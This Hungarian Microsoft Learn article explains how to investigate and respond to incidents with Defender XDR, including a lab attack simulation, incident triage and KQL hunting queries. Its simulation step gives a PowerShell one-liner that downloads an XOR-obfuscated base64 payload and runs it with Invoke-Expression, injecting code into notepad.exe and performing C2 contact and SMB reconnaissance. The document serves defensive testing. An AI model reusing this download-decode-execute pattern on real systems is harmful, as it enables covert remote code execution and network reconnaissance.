Megosztás a következőn keresztül:

Vizsgálat és válaszadás a Microsoft Defender XDR használatával

  • Cikk

Érintett szolgáltatás:

  • Microsoft Defender XDR

Ez a cikk ismerteti az incidensek támadásszimulációkkal és oktatóanyagokkal való létrehozásának folyamatát, valamint a Microsoft Defender XDR használatát a vizsgálathoz és a válaszadáshoz. A folyamat megkezdése előtt ellenőrizze, hogy áttekintette-e a Microsoft Defender XDR kipróbálásának és üzembe helyezésének általános folyamatát, és legalább tesztelte a Microsoft Defender XDR egyes összetevőit.

A Microsoft Defender XDR incidensei korrelált riasztások és kapcsolódó adatok gyűjteményei, amelyek egy támadás történetét alkotják. A Microsoft 365 szolgáltatásai és alkalmazásai riasztásokat hoznak létre, ha gyanús vagy rosszindulatú eseményt vagy tevékenységet észlelnek. Az egyes riasztások értékes nyomokat szolgáltatnak egy befejezett vagy folyamatban lévő támadásról. A támadások azonban általában különböző technikákat alkalmaznak különböző típusú entitások, például eszközök, felhasználók és postaládák ellen. Az eredmény több riasztás a bérlő több entitására vonatkozóan.

Megjegyzés:

Ha még csak most ismerkedik a biztonsági elemzéssel és az incidensmegoldással, tekintse meg a Válasz az első incidensre című útmutatót , amely egy tipikus elemzési, szervizelési és incidens utáni áttekintési folyamatot ismerteti.

Teljes körű üzembe helyezés a Microsoft Defender XDR-hez

Ez egy sorozat 6/6. cikke, amely segítséget nyújt a Microsoft Defender XDR összetevőinek üzembe helyezéséhez, beleértve az incidensek kivizsgálását és megválaszolását.

Egy diagram, amely bemutatja az incidensek vizsgálatát és reagálását a próbaüzemben és a Microsoft Defender XDR-folyamat üzembe helyezésében.

Az ebben a sorozatban szereplő cikkek a teljes üzembe helyezés következő fázisainak felelnek meg:

Fázis Láncszem
Egy. A próbaüzem indítása A próbaüzem indítása
B. Microsoft Defender XDR-összetevők kipróbálása és üzembe helyezése - A Defender for Identity próbaüzeme és üzembe helyezése

- Az Office 365-höz készült Defender próbaüzeme és üzembe helyezése

- Végponthoz készült Defender próbaüzeme és üzembe helyezése

- A Microsoft Defender for Cloud Apps próbaüzeme és üzembe helyezése
C. Veszélyforrások vizsgálata és reagálás rájuk Incidensvizsgálat és reagálás gyakorlata (ez a cikk)

A próbaüzem és az üzembe helyezés során bármikor tesztelheti a Microsoft Defender XDR incidensmegoldási és automatizált vizsgálati és javítási képességeit, ha szimulált támadással hoz létre incidenst, és a Microsoft Defender portált használja a vizsgálathoz és a válaszadáshoz.

Munkafolyamat incidensvizsgálathoz és reagáláshoz a Microsoft Defender XDR használatával

Az alábbi munkafolyamattal vizsgálhatja meg és válaszolhatja meg az incidenseket a Microsoft Defender XDR használatával az éles környezetben.

Az incidensek kivizsgálására és elhárítására vonatkozó lépéseket bemutató diagram.

Hajtsa végre az alábbi lépéseket:

  1. Támadások szimulálása a Microsoft Defender portállal
  2. Incidensek rangsorolása
  3. Incidensek kezelése
  4. Automatizált vizsgálat és reagálás vizsgálata a Műveletközponttal
  5. Speciális veszélyforrás-keresés használata

1. lépés: Támadások szimulálása a Microsoft Defender portállal

A Microsoft Defender portál beépített képességeivel szimulált támadásokat hozhat létre a próbakörnyezetben:

Az Office 365-höz készült Defender támadásszimulációs képzése

Az Office 365-höz készült Defender a Microsoft 365 E5 csomaggal vagy az Office 365-höz készült Microsoft Defender 2. csomaggal tartalmaz támadásszimulációs képzést az adathalász támadásokhoz. Az alapvető lépések a következők:

  1. Szimuláció létrehozása

    Az új szimulációk létrehozásával és elindításával kapcsolatos részletes útmutatásért lásd: Adathalászati támadás szimulálása.

  2. Hasznos adat létrehozása

    A hasznos adatok szimuláción belüli létrehozásához szükséges részletes útmutatásért lásd: Egyéni hasznos adat létrehozása támadásszimulációs betanításhoz.

  3. Elemzések készítése

    A jelentéskészítéssel kapcsolatos megállapítások részletes megismeréséhez lásd: Elemzések megszerzése támadásszimulációs betanítással.

További információ: Szimulációk.

A Végponthoz készült Defender támadásokkal kapcsolatos oktatóanyagai & szimulációkhoz

A Végponthoz készült Defender szimulációi a Microsofttól:

  • Dokumentumcsúcsok visszalépése
  • Automatizált vizsgálat (backdoor)

További szimulációk érhetők el külső forrásokból. Emellett oktatóanyagok is rendelkezésre áll.

Minden szimulációhoz vagy oktatóanyaghoz:

  1. Töltse le és olvassa el a megfelelő útmutató dokumentumot.

  2. Töltse le a szimulációs fájlt. Letöltheti a fájlt vagy a szkriptet a teszteszközre, de ez nem kötelező.

  3. Futtassa a szimulációs fájlt vagy szkriptet a teszteszközön az útmutatóban leírtak szerint.

További információ: A Végponthoz készült Microsoft Defender használata szimulált támadással.

Támadás szimulálása elkülönített tartományvezérlővel és ügyféleszközzel (nem kötelező)

Ebben az opcionális incidensmegoldási gyakorlatban egy PowerShell-szkripttel szimulál egy támadást egy elkülönített Active Directory Domain Services- (AD DS-) tartományvezérlőn és Windows-eszközön, majd kivizsgálja, orvosolja és megoldja az incidenst.

Először végpontokat kell hozzáadnia a próbakörnyezethez.

Próbakörnyezeti végpontok hozzáadása

Először fel kell vennie egy elkülönített AD DS-tartományvezérlőt és egy Windows-eszközt a próbakörnyezetbe.

  1. Ellenőrizze, hogy a próbakörnyezet bérlője engedélyezte-e a Microsoft Defender XDR-t.

  2. Ellenőrizze, hogy a tartományvezérlő:

  3. Ellenőrizze, hogy a teszteszköz:

Ha bérlői és eszközcsoportokat használ, hozzon létre egy dedikált eszközcsoportot a teszteszközhöz, és küldje le a legfelső szintre.

Az egyik alternatíva az AD DS-tartományvezérlő üzemeltetésére és az eszköz virtuális gépként való tesztelésére a Microsoft Azure infrastruktúra-szolgáltatásokban. A szimulált vállalati tesztkörnyezet útmutatójának 1. fázisában található utasításokat használhatja, de kihagyhatja az APP1 virtuális gép létrehozását.

Itt látható az eredmény.

A kiértékelési környezet diagramja a szimulált vállalati tesztkörnyezet útmutatójának használatával.

Kifinomult támadást fog szimulálni, amely fejlett technikákat használ az észlelés elől való elrejtéshez. A támadás számba adja a megnyitott SMB-munkameneteket a tartományvezérlőkön, és lekéri a felhasználók eszközeinek legutóbbi IP-címeit. Ez a támadási kategória általában nem tartalmazza az áldozat eszközére dobott fájlokat, és kizárólag a memóriában fordulnak elő. A meglévő rendszer- és felügyeleti eszközökkel "a földről élnek", és kódjukat a rendszerfolyamatokba injektálva elrejtik a végrehajtásukat. Az ilyen viselkedés lehetővé teszi számukra az észlelés elkerülését és az eszközön való megőrzését.

Ebben a szimulációban a mintaforgatókönyv egy PowerShell-szkripttel kezdődik. A való világban előfordulhat, hogy a felhasználót becsapják egy szkript futtatására, vagy a szkript egy távoli kapcsolatról futhat egy másik számítógéppel egy korábban fertőzött eszközről, ami azt jelzi, hogy a támadó oldalirányú mozgást kísérel meg a hálózaton. A szkriptek észlelése nehéz lehet, mert a rendszergazdák gyakran távolról is futtatnak szkripteket a különböző felügyeleti tevékenységek végrehajtásához.

Képernyőkép a fájl nélküli PowerShell-támadásról folyamatinjektálással és SMB felderítési támadással.

A szimuláció során a támadás egy látszólag ártatlan folyamatba szúrja be a héjkódot. A forgatókönyv használatához notepad.exe kell használni. Ezt a folyamatot választottuk a szimulációhoz, de a támadók nagyobb valószínűséggel egy hosszú ideig futó rendszerfolyamatot céloznának meg, például svchost.exe. A rendszerhéjkód ezután kapcsolatba lép a támadó parancs- és vezérlési (C2) kiszolgálóval, hogy utasításokat kapjon a folytatáshoz. A szkript felderítési lekérdezéseket kísérel meg végrehajtani a tartományvezérlőn (DC). A felderítés lehetővé teszi, hogy a támadó információkat kapjon a legutóbbi felhasználói bejelentkezési adatokról. Miután a támadók megkapták ezeket az információkat, oldalirányban mozoghatnak a hálózaton, hogy egy adott bizalmas fiókhoz lépjenek

Fontos

Az optimális eredmények érdekében a lehető legszorosabban kövesse a támadásszimulációs utasításokat.

Az izolált AD DS tartományvezérlő támadásszimulációjának futtatása

A támadási forgatókönyv szimulációjának futtatása:

  1. Győződjön meg arról, hogy a próbakörnyezet tartalmazza az elkülönített AD DS-tartományvezérlőt és a Windows-eszközt.

  2. Jelentkezzen be a teszteszközre a tesztfelhasználói fiókkal.

  3. Nyisson meg egy Windows PowerShell-ablakot a teszteszközön.

  4. Másolja ki a következő szimulációs szkriptet:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    Megjegyzés:

    Ha webböngészőben nyitja meg ezt a cikket, előfordulhat, hogy problémákba ütközik a teljes szöveg másolása bizonyos karakterek elvesztése vagy további sortörések bevezetése nélkül. Ebben az esetben töltse le ezt a dokumentumot, és nyissa meg az Adobe Readerben.

  5. Illessze be és futtassa a másolt szkriptet a PowerShell-ablakban.

Megjegyzés:

Ha a PowerShellt távoli asztali protokoll (RDP) használatával futtatja, használja a Vágólap szövegének beírása parancsot az RDP-ügyfélben, mert előfordulhat, hogy a CTRL-V gyorsbillentyű vagy a jobb gombbal kattintva beillesztett metódus nem működik. A PowerShell legutóbbi verziói néha nem fogadják el ezt a módszert, előfordulhat, hogy először a jegyzettömbbe kell másolnia a memóriában, majd a virtuális gépre kell másolnia, majd be kell illesztenie a PowerShellbe.

Néhány másodperccel később megnyílik a Jegyzettömb alkalmazás. A rendszer egy szimulált támadási kódot szúr be a Jegyzettömbbe. Tartsa nyitva az automatikusan létrehozott Jegyzettömb-példányt, hogy a teljes forgatókönyvet átélhesse.

A szimulált támadási kód megpróbál kommunikálni egy külső IP-címmel (szimulálva a C2-kiszolgálót), majd megpróbálja felderíteni a tartományvezérlőt az SMB-n keresztül.

A szkript befejeződésekor ez az üzenet jelenik meg a PowerShell-konzolon:

ran NetSessionEnum against [DC Name] with return code result 0

Az Automatikus incidens és reagálás funkció működés közbeni megtekintéséhez hagyja nyitva a notepad.exe folyamatot. Megjelenik az Automatizált incidens és reagálás leállítása a Jegyzettömb folyamatában.

A szimulált támadás incidensének vizsgálata

Megjegyzés:

Mielőtt végigvezetnénk ezen a szimuláción, tekintse meg az alábbi videót, amelyből megtudhatja, hogyan segít az incidenskezelés a kapcsolódó riasztások összeállításában a vizsgálati folyamat részeként, hol található meg a portálon, és hogyan segíthet a biztonsági műveletekben:

Az SOC-elemzői nézőpontra váltva megkezdheti a támadás kivizsgálását a Microsoft Defender portálon.

  1. Nyissa meg a Microsoft Defender portált.

  2. A navigációs panelen válassza az Incidensek & riasztási > incidensek lehetőséget.

  3. A szimulált támadás új incidense megjelenik az incidenssorban.

    Képernyőkép az Incidensek üzenetsorról.

A támadás vizsgálata egyetlen incidensként

A Microsoft Defender XDR korrelálja az elemzéseket, és összesíti a különböző termékekből származó összes kapcsolódó riasztást és vizsgálatot egy incidensentitásba. Ezzel a Microsoft Defender XDR egy szélesebb körű támadási történetet mutat be, amely lehetővé teszi az SOC-elemző számára, hogy megértse és reagáljon az összetett fenyegetésekre.

A szimuláció során létrehozott riasztások ugyanahhoz a fenyegetéshez vannak társítva, ezért a rendszer automatikusan egyetlen incidensként összesíti azokat.

Az incidens megtekintése:

  1. Nyissa meg a Microsoft Defender portált.

  2. A navigációs panelen válassza az Incidensek & riasztási > incidensek lehetőséget.

  3. Válassza ki a legújabb elemet az incidens nevével balra található körre kattintva. Az oldalsó panel további információkat jelenít meg az incidensről, beleértve az összes kapcsolódó riasztást is. Minden incidensnek egyedi neve van, amely a benne foglalt riasztások attribútumai alapján írja le.

    Az irányítópulton megjelenő riasztások a következő szolgáltatási erőforrások alapján szűrhetők: Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, Végponthoz készült Microsoft Defender, Microsoft Defender XDR és Office 365-höz készült Microsoft Defender.

  4. Válassza az Incidensoldal megnyitása lehetőséget az incidenssel kapcsolatos további információkért.

    Az Incidens oldalon megtekintheti az incidenssel kapcsolatos összes riasztást és információt. Az információk közé tartoznak a riasztásban érintett entitások és objektumok, a riasztások észlelési forrása (például a Microsoft Defender for Identity vagy a Végponthoz készült Microsoft Defender), valamint az összekapcsolásuk oka. Az incidensriasztások listájának áttekintése a támadás előrehaladását mutatja. Ebben a nézetben megtekintheti és megvizsgálhatja az egyes riasztásokat.

    A jobb oldali menü Incidens kezelése elemére kattintva címkézheti meg az incidenst, saját magához rendelheti, és megjegyzéseket adhat hozzá.

A létrehozott riasztások áttekintése

Tekintsünk meg néhány riasztást, amely a szimulált támadás során jön létre.

Megjegyzés:

A szimulált támadás során létrehozott riasztások közül csak néhányat vizsgáljuk meg. A Windows verziójától és a teszteszközön futó Microsoft Defender XDR-termékektől függően előfordulhat, hogy további riasztások jelennek meg, amelyek kissé eltérő sorrendben jelennek meg.

Képernyőkép egy létrehozott riasztásról.

Riasztás: Gyanús folyamatinjektálás figyelhető meg (forrás: Végponthoz készült Microsoft Defender)

A fejlett támadók kifinomult és rejtett módszereket használnak a memóriában való megőrzéshez és az észlelési eszközök elől való elrejtéshez. Az egyik gyakori módszer a megbízható rendszerfolyamatból való működés, nem pedig egy rosszindulatú végrehajtható fájl, ami megnehezíti az észlelési eszközök és a biztonsági műveletek számára a rosszindulatú kód észlelését.

Annak érdekében, hogy az SOC-elemzők elkaphassák ezeket a speciális támadásokat, a Végponthoz készült Microsoft Defender mélymemória-érzékelői soha nem látott betekintést nyújtanak a felhőszolgáltatásunkba számos folyamatközi kódinjektálási technikába. Az alábbi ábra bemutatja, hogyan észlelte és figyelmeztette a Végponthoz készült Defendert, amikor kódot próbált beszúrni notepad.exe.

Képernyőkép egy potenciálisan rosszindulatú kód injektálását jelző riasztásról.

Riasztás: Parancssori argumentumok nélküli folyamatfuttatás által megfigyelt váratlan viselkedés (forrás: Végponthoz készült Microsoft Defender)

A Végponthoz készült Microsoft Defender észlelései gyakran a támadási technikák leggyakoribb attribútumait célzják. Ez a módszer biztosítja a tartósságot, és megnöveli a lécet a támadók számára, hogy újabb taktikákra váltson.

Nagy léptékű tanulási algoritmusokat alkalmazunk, hogy megállapítsuk egy szervezeten belül és világszerte a gyakori folyamatok normális viselkedését, és figyeljük, hogy ezek a folyamatok mikor mutatnak rendellenes viselkedést. Ezek a rendellenes viselkedések gyakran azt jelzik, hogy idegen kód lett bevezetve, és egy egyébként megbízható folyamatban fut.

Ebben a forgatókönyvben a folyamatnotepad.exe rendellenes viselkedést mutat, beleértve a külső helyekkel való kommunikációt is. Ez az eredmény független a rosszindulatú kód bevezetéséhez és végrehajtásához használt konkrét módszerétől.

Megjegyzés:

Mivel ez a riasztás olyan gépi tanulási modelleken alapul, amelyek további háttérfeldolgozást igényelnek, eltarthat egy ideig, amíg megjelenik ez a riasztás a portálon.

Figyelje meg, hogy a riasztás részletei tartalmazzák a külső IP-címet – ez egy olyan mutató, amelyet kimutatásként használhat a vizsgálat kibontásához.

Válassza ki az IP-címet a riasztási folyamat fájában az IP-cím részleteinek megtekintéséhez.

Képernyőkép egy parancssori argumentumok nélküli folyamatfuttatás váratlan viselkedéséről.

Az alábbi ábrán a kiválasztott IP-cím részletei lap látható (a Riasztási folyamat fájában kattintson az IP-címre).

Képernyőkép az IP-cím részleteit tartalmazó oldalról.

Riasztás: Felhasználói és IP-címek felderítése (SMB) (Forrás: Microsoft Defender for Identity)

A Server Message Block (SMB) protokollt használó enumerálás lehetővé teszi a támadók számára a legutóbbi felhasználói bejelentkezési adatok lekérését, amelyek segítségével oldalirányban mozognak a hálózaton egy adott bizalmas fiók elérése érdekében.

Ebben az észlelésben riasztás aktiválódik, ha az SMB-munkamenet számbavétele egy tartományvezérlőn fut.

Képernyőkép a Microsoft Defender for Identity felhasználó- és IP-címfelderítésre vonatkozó riasztásáról.

Az eszköz idővonalának áttekintése a Végponthoz készült Microsoft Defenderrel

Az incidens különböző riasztásainak felfedezése után lépjen vissza a korábban megvizsgált incidensoldalra. Az incidens oldalán az Eszközök fülre kattintva áttekintheti az incidensben érintett eszközöket a Végponthoz készült Microsoft Defender és a Microsoft Defender for Identity által jelentett módon.

Válassza ki annak az eszköznek a nevét, amelyen a támadás történt, és nyissa meg az adott eszköz entitáslapját. Ezen az oldalon megtekintheti az aktivált riasztásokat és a kapcsolódó eseményeket.

Az Idősor fülre kattintva nyissa meg az eszköz ütemtervét, és tekintse meg az eszközön megfigyelt összes eseményt és viselkedést időrendi sorrendben, a riasztásokkal együtt.

Képernyőkép az eszköz idővonalának viselkedésével kapcsolatos példájáról.

Az érdekesebb viselkedések kibontása hasznos részleteket tartalmaz, például folyamatfákat.

Görgessen le például, amíg meg nem találja a megfigyelt Gyanús folyamatinjektálás riasztási eseményt. Válassza ki az alatta lévő notepad.exe folyamateseménybe injektáltpowershell.exe a viselkedés teljes folyamatfáját az oldalpanel Eseményentitások grafikonján. Szükség esetén használja a keresősávot a szűréshez.

Képernyőkép a kiválasztott PowerShell-fájllétrehozás folyamatfáját ábrázoló példáról.

A felhasználói adatok áttekintése a Microsoft Defender for Cloud Apps használatával

Az incidens oldalán válassza a Felhasználók lapot a támadásban érintett felhasználók listájának megjelenítéséhez. A táblázat további információkat tartalmaz az egyes felhasználókról, beleértve az egyes felhasználók vizsgálati prioritási pontszámát is.

Válassza ki a felhasználónevet a felhasználó profillapjának megnyitásához, ahol további vizsgálat végezhető. További információ a kockázatos felhasználók vizsgálatáról.

Képernyőkép egy Példa a Defender for Cloud Apps felhasználói oldalára.

Automatizált vizsgálat és szervizelés

Megjegyzés:

Mielőtt végigvezetnénk ezen a szimuláción, tekintse meg az alábbi videót, amelyből megismerheti az automatikus önjavítást, hogy hol található a portálon, és hogyan segíthet a biztonsági műveletekben:

Lépjen vissza az incidenshez a Microsoft Defender portálon. Az Incidens lap Vizsgálat lapja a Microsoft Defender for Identity és a Végponthoz készült Microsoft Defender által indított automatizált vizsgálatokat mutatja. Az alábbi képernyőképen csak a Végponthoz készült Defender által aktivált automatizált vizsgálat látható. Alapértelmezés szerint a Végponthoz készült Defender automatikusan szervizeli az üzenetsorban található összetevőket, ami szervizelést igényel.

Képernyőkép az incidenshez kapcsolódó automatizált vizsgálatokról.

Válassza ki a vizsgálatot kiváltó riasztást a Vizsgálat részletei lap megnyitásához. A következő részletek láthatók:

  • Az automatizált vizsgálatot kiváltó riasztás(ok).
  • Érintett felhasználók és eszközök. Ha további eszközökön is találhatók jelzők, ezek a további eszközök is fel lesznek sorolva.
  • Bizonyítéklista. A talált és elemzett entitások, például fájlok, folyamatok, szolgáltatások, illesztőprogramok és hálózati címek. Ezeket az entitásokat a rendszer elemzi a riasztással való lehetséges kapcsolatok alapján, és jóindulatúnak vagy rosszindulatúnak minősíti őket.
  • Fenyegetések találhatók. A vizsgálat során észlelt ismert fenyegetések.

Megjegyzés:

Az időzítéstől függően előfordulhat, hogy az automatizált vizsgálat továbbra is fut. Várjon néhány percet, amíg a folyamat befejeződik, mielőtt összegyűjti és elemzi a bizonyítékokat, és áttekinti az eredményeket. Frissítse a Vizsgálat részletei oldalt a legújabb eredmények lekéréséhez.

Képernyőkép a Vizsgálat részletei lapról.

Az automatizált vizsgálat során a Végponthoz készült Microsoft Defender azonosította a notepad.exe folyamatot, amelyet a rendszer a szervizelést igénylő összetevők egyikeként szúrt be. A Végponthoz készült Defender automatikusan leállítja a gyanús folyamatinjektálást az automatikus szervizelés részeként.

Láthatja ,notepad.exe eltűnik a teszteszközön futó folyamatok listájából.

Az incidens megoldása

Miután a vizsgálat befejeződött, és meggyőződött a javításról, meg kell oldania az incidenst.

Az Incidens lapon válassza az Incidens kezelése lehetőséget. Állítsa az állapotot Incidens feloldása értékre, majd válassza az Igaz riasztás lehetőséget a besoroláshoz és a biztonsági teszteléshez a meghatározáshoz.

Képernyőkép az incidensek lap egy példájáról a megnyitott Incidens kezelése panellel, ahol az incidens megoldásához kattintson a kapcsolóra.

Az incidens megoldásakor az összes kapcsolódó riasztást feloldja a Microsoft Defender portálon és a kapcsolódó portálokon.

Ez becsomagolja a támadásszimulációkat az incidenselemzéshez, az automatizált vizsgálathoz és az incidensmegoldáshoz.

2. lépés: Incidensek rangsorolása

Az incidenssort az Incidensek & riasztásokból > érheti el Az incidensek a Microsoft Defender portál gyors indításakor. Íme egy példa.

Képernyőkép a Microsoft Defender portál Incidensek & riasztások szakaszáról.

A Legutóbbi incidensek és riasztások szakasz a kapott riasztások és az elmúlt 24 órában létrehozott incidensek számát ábrázolja.

Az incidensek listájának vizsgálatához és azok hozzárendeléshez és vizsgálathoz való fontosságának rangsorolásához az alábbiakat teheti:

  • Konfigurálhatja a testre szabható oszlopokat (válassza az Oszlopok kiválasztása lehetőséget), hogy betekintést nyújtson az incidens vagy az érintett entitások különböző jellemzőibe. Ez segít megalapozott döntést hozni az incidensek rangsorolásáról elemzés céljából.

  • Szűréssel egy adott forgatókönyvre vagy fenyegetésre összpontosíthat. Ha szűrőket alkalmaz az incidenssorra, az segíthet meghatározni, hogy mely incidensek igényelnek azonnali figyelmet.

Az alapértelmezett incidenssorban válassza a Szűrők lehetőséget a Szűrők panel megjelenítéséhez, amelyből megadhat egy adott incidenskészletet. Íme egy példa.

Képernyőkép a Microsoft Defender portál Incidensek & riasztások szakaszának Szűrők paneljéről.

További információ: Incidensek rangsorolása.

3. lépés: Incidensek kezelése

Az incidenseket az Incidensek kezelése panelen kezelheti. Íme egy példa.

Képernyőkép a Microsoft Defender portál Incidensek & riasztások szakaszának Incidensek kezelése paneljéről.

Ezt a panelt az Incidens kezelése hivatkozáson jelenítheti meg a következő helyről:

  • Egy incidens Tulajdonságok panelje az incidenssorban.
  • Incidens összefoglaló oldala.

Az incidensek kezelésének módjai a következők:

  • Az incidens nevének szerkesztése

    Módosítsa az automatikusan hozzárendelt nevet a biztonsági csapat ajánlott eljárásainak megfelelően.

  • Incidenscímkék hozzáadása

    Adjon hozzá címkéket, amelyeket a biztonsági csapat használ az incidensek besorolásához, amelyek később szűrhetők.

  • Az incidens hozzárendelése

    Rendelje hozzá egy felhasználói fióknévhez, amely később szűrhető.

  • Incidens megoldása

    A javítás után zárja be az incidenst.

  • A besorolás és a meghatározás beállítása

    Incidens megoldásakor sorolja be és válassza ki a fenyegetés típusát.

  • Megjegyzések hozzáadása

    A biztonsági csapat ajánlott eljárásai alapján megjegyzéseket fűzhet az előrehaladáshoz, jegyzetekhez és egyéb információkhoz. A megjegyzések teljes előzményei az incidens részletek oldalán található Megjegyzések és előzmények lehetőségből érhetők el.

További információ: Incidensek kezelése.

4. lépés: Automatizált vizsgálat és reagálás vizsgálata a Műveletközponttal

Attól függően, hogy az automatizált vizsgálati és válaszképességek hogyan vannak konfigurálva a szervezet számára, a szervizelési műveleteket a rendszer automatikusan vagy csak a biztonsági üzemeltetési csapat jóváhagyásával hajtja végre. A Műveletközpontban minden függőben lévő vagy befejezett művelet megjelenik, amely felsorolja az eszközök függőben lévő és befejezett szervizelési műveleteit, az e-mail-& az együttműködési tartalmat és az identitásokat egy helyen.

Íme egy példa.

Képernyőkép a Microsoft Defender portál egyesített műveletközpontjáról.

A Műveletközpontban kiválaszthatja a függőben lévő műveleteket, majd jóváhagyhatja vagy elutasíthatja őket az úszó panelen. Íme egy példa.

Képernyőkép a Microsoft Defender portálon egy művelet jóváhagyására vagy elutasítására vonatkozó lehetőségeket megjelenítő panelről.

Hagyja jóvá (vagy utasítsa el) a függőben lévő műveleteket a lehető leghamarabb, hogy az automatizált vizsgálat időben folytatódjon és befejeződjön.

További információ: Automatizált vizsgálat és reagálás és Műveletközpont.

5. lépés: Speciális veszélyforrás-keresés használata

Megjegyzés:

Mielőtt végigvezetnénk a speciális veszélyforrás-szimuláción, tekintse meg az alábbi videót a speciális veszélyforrás-keresési fogalmak megismeréséhez, a portálon való megkereséséhez és a biztonsági műveletekben való segítségére.


Ha a választható fájl nélküli PowerShell-támadásszimuláció valós támadás volt, amely már elérte a hitelesítő adatok hozzáférési fázisát, a vizsgálat bármely pontján használhatja a speciális veszélyforrás-keresést, hogy proaktívan keressen a hálózat eseményeiben és rekordjaiban a generált riasztásokból és az érintett entitásokból már ismert adatok alapján.

A felhasználó- és IP-címfelderítési (SMB) -riasztásban található információk alapján például a IdentityDirectoryEvents táblával megkeresheti az SMB-munkamenetek összes enumerálási eseményét, vagy további felderítési tevékenységeket kereshet a Microsoft Defender for Identity adataiban a táblával IdentityQueryEvents .

Veszélyforrás-keresési környezet követelményei

Ehhez a szimulációhoz egyetlen belső postaláda és eszköz szükséges. A tesztüzenet elküldéséhez külső e-mail-fiókra is szüksége lesz.

  1. Ellenőrizze, hogy a bérlő engedélyezte-e a Microsoft Defender XDR-t.

  2. Azonosítsa az e-mailek fogadásához használandó célpostaládát.

    • Ezt a postaládát az Office 365-höz készült Microsoft Defendernek kell figyelnie

    • A 3. követelménynek megfelelő eszköznek hozzá kell férnie ehhez a postaládához

  3. Teszteszköz konfigurálása:

    a. Győződjön meg arról, hogy a Windows 10 1903-es vagy újabb verzióját használja.

    b. Csatlakoztassa a teszteszközt a teszttartományhoz.

    c. Kapcsolja be a Microsoft Defender víruskeresőt. Ha nem sikerül engedélyeznie a Microsoft Defender víruskeresőt, tekintse meg ezt a hibaelhárítási témakört.

    d. Bevezetés a Végponthoz készült Microsoft Defenderbe.

A szimuláció futtatása

  1. Külső e-mail-fiókból küldjön egy e-mailt a veszélyforrás-keresési környezet követelményei szakasz 2. lépésében azonosított postaládába. Csatoljon egy mellékletet, amely bármely meglévő e-mail-szűrési szabályzaton keresztül engedélyezve lesz. Ennek a fájlnak nem kell rosszindulatúnak vagy végrehajthatónak lennie. A javasolt fájltípusok a következők:.pdf, .exe (ha engedélyezett) vagy egy Office-dokumentumtípus, például Egy Word-fájl.

  2. Nyissa meg az elküldött e-mailt a veszélyforrás-keresési környezet követelményei szakasz 3. lépésében meghatározott módon konfigurált eszközről. Nyissa meg a mellékletet, vagy mentse a fájlt az eszközre.

Veszélyforrás-keresés

  1. Nyissa meg a Microsoft Defender portált.

  2. A navigációs panelen válassza a Veszélyforrás-keresés speciális veszélyforrás-keresés >lehetőséget.

  3. Hozzon létre egy lekérdezést, amely az e-mail-események összegyűjtésével kezdődik.

    1. Válassza az Új lekérdezés lehetőséget>.

    2. A Speciális veszélyforrás-keresés alatti E-mail csoportokban kattintson duplán az E-mailEsemények elemre. Ezt a lekérdezési ablakban kell látnia.

      EmailEvents

    3. Módosítsa a lekérdezés időkeretét az elmúlt 24 órára. Feltéve, hogy a fenti szimuláció futtatásakor küldött e-mail az elmúlt 24 órában volt, ellenkező esetben szükség szerint módosítsa az időkeretet.

    4. Válassza a Lekérdezés futtatása lehetőséget. A próbakörnyezettől függően eltérő eredményeket kaphat.

      Megjegyzés:

      Az adatvisszatérítés korlátozására vonatkozó szűrési lehetőségekről a következő lépésben olvashat.

      Képernyőkép a Microsoft Defender portál Speciális veszélyforrás-keresés oldaláról.

      Megjegyzés:

      A speciális veszélyforrás-keresés táblázatos adatokként jeleníti meg a lekérdezési eredményeket. Az adatokat más formátumtípusokban, például diagramokban is megtekintheti.

    5. Tekintse meg az eredményeket, és ellenőrizze, hogy azonosítani tudja-e a megnyitott e-mailt. Akár két órába is telhet, mire az üzenet megjelenik a speciális veszélyforrás-keresésben. Az eredmények szűkítéséhez hozzáadhatja a where feltételt a lekérdezéshez, így csak azokat az e-maileket keresheti meg, amelyek feladóimailfromdomainként "yahoo.com". Íme egy példa.

      EmailEvents
| where SenderMailFromDomain == "yahoo.com"

    6. Kattintson a lekérdezés eredményként kapott soraira, hogy megvizsgálhassa a rekordot.

      Képernyőkép a Microsoft Defender portál Speciális veszélyforrás-keresés lapjának Rekord vizsgálata szakaszáról.

  4. Most, hogy meggyőződett arról, hogy láthatja az e-mailt, adjon hozzá egy szűrőt a mellékletekhez. Koncentráljon a környezetben mellékleteket tartalmazó összes e-mailre. Ebben a szimulációban a bejövő e-mailekre koncentráljon, ne azokra, amelyeket a környezetéből küldenek ki. Távolítsa el a hozzáadott szűrőket az üzenet megkereséséhez és a "| where AttachmentCount > 0 and EmailDirection == "Inbound""

    Az alábbi lekérdezés az eredményt az összes e-mailes esemény kezdeti lekérdezésénél rövidebb listával jeleníti meg:

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"

  5. Ezután adja meg az eredményhalmazhoz tartozó melléklet adatait (például: fájlnév, kivonatok). Ehhez csatlakozzon az EmailAttachmentInfo táblához. A csatlakozáshoz használt gyakori mezők ebben az esetben a NetworkMessageId és a RecipientObjectId.

    A következő lekérdezés egy további sort is tartalmaz: "| project-rename EmailTimestamp=Timestamp", amely segít azonosítani, hogy melyik időbélyeg kapcsolódott az e-mailhez és az időbélyegekhez a következő lépésben hozzáadandó fájlműveletekhez.

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId

  6. Ezután az EmailAttachmentInfo tábla SHA256 értékével keresse meg az adott kivonathoz tartozó DeviceFileEvents (a végponton végrehajtott fájlműveletek) értékét. Itt a közös mező a melléklet SHA256-kivonata lesz.

    Az eredményként kapott táblázat mostantól tartalmazza a végpont (Végponthoz készült Microsoft Defender) adatait, például az eszköz nevét, a végrehajtott műveletet (ebben az esetben csak a FileCreated eseményekre szűrve), valamint a fájl tárolási helyét. A folyamathoz társított fióknév is szerepelni fog.

    EmailEvents
